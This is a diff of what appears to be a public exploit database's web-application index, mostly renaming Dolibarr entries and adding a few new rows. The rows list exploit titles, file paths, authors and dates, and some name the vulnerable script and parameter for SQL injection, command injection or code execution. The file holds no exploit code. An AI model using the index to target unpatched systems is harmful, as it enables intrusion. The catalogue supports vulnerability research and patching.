Forgery",2012-02-20,"Ivano Binetti",webapps,hardware, 18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php, @@ -26149,7 +26155,7 @@ id,file,description,date,author,type,platform,port 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php, 18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi, 18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php, -18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php, +18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php, 18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php, 18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php, 18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",webapps,php, @@ -30956,7 +30962,7 @@ id,file,description,date,author,type,platform,port 28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php, 28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php, 28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - (Authenticated) Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80 -28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80 +28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80 28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix, 28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios, 28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios, @@ -34015,7 +34021,7 @@ id,file,description,date,author,type,platform,port 34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, 34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, 34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, -34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php, +34007,exploits/php/webapps/34007.txt,"Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php, 34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php, 34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",webapps,php, 34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,webapps,php, @@ -35052,7 +35058,7 @@ id,file,description,date,author,type,platform,port 35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",webapps,php, 35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php, 35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",webapps,php, -35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php, +35651,exploits/php/webapps/35651.txt,"Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php, 35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php, 35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",webapps,php, 35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",webapps,php, @@ -35476,9 +35482,9 @@ id,file,description,date,author,type,platform,port 36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,webapps,php, 36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,webapps,php, 36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",webapps,php, -36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php, -36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php, -36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php, +36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php, +36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php, +36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php, 36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,webapps,php, 36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,webapps,php, 36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,webapps,php, @@ -35715,7 +35721,7 @@ id,file,description,date,author,type,platform,port 36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80 36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80 36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp, -36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php, +36683,exploits/php/webapps/36683.txt,"Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php, 36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java, 36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php, 36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php, @@ -35831,7 +35837,7 @@ id,file,description,date,author,type,platform,port 36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,webapps,hardware, 36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,webapps,php, 36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",webapps,php, -36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php, +36873,exploits/php/webapps/36873.txt,"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php, 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php, 36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php, 36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,webapps,php, @@ -39554,7 +39560,7 @@ id,file,description,date,author,type,platform,port 44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java, 44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos, 44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80 -44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80 +44805,exploits/php/webapps/44805.txt,"Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection",2018-05-30,Sysdream,webapps,php,80 44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware, 44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php, 44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php, @@ -39634,12 +39640,13 @@ id,file,description,date,author,type,platform,port 44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80 44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware, 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80 -44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80 +44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua, -44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java, +44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php, 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php, +45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80 44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80 44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php, @@ -39650,3 +39657,6 @@ id,file,description,date,author,type,platform,port 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware, 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php, 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple, +45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443 +45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80 +45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,